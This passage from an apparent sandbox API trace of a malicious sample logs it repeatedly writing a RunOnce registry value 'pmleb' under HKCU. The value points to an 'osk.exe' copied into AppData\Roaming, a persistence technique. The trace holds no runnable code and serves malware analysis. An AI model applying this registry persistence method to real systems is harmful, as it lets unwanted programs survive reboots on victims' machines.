(lpMsg=0x33f7fc) returned 0 [0081.235] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.235] KillTimer (hWnd=0x20280, uIDEvent=0x20a4) returned 1 [0081.235] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.235] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.235] IUnknown:Release (This=0x787518) returned 0x1 [0081.235] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0081.236] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.236] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.236] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.236] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.236] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0081.236] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.236] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2a [0081.236] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.237] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0081.237] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.237] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.237] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.237] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.237] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.237] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.238] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.238] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.238] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.238] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.238] RegCloseKey (hKey=0x280) returned 0x0 [0081.238] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.238] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.238] SetTimer (hWnd=0x20280, nIDEvent=0x20a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a5 [0081.239] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.250] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.250] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.250] KillTimer (hWnd=0x20280, uIDEvent=0x20a5) returned 1 [0081.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.251] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.251] IUnknown:Release (This=0x787518) returned 0x1 [0081.251] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.251] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.251] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.251] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.251] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.252] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.252] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.252] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.252] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a [0081.252] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.252] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2b [0081.252] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.253] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2a 
[0081.253] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.253] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.253] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.253] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.253] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.253] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.253] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.253] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.254] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.254] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.254] RegCloseKey (hKey=0x280) returned 0x0 [0081.254] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.254] SetTimer (hWnd=0x20280, nIDEvent=0x20a6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a6 [0081.254] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.266] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.266] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.267] KillTimer (hWnd=0x20280, uIDEvent=0x20a6) returned 1 [0081.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.267] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.267] IUnknown:Release (This=0x787518) returned 0x1 [0081.267] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.267] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.267] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.267] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.267] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.268] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0081.268] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.268] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2c [0081.268] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.268] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2b [0081.269] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.269] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.269] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0081.269] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.269] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.269] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.269] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.269] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.269] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
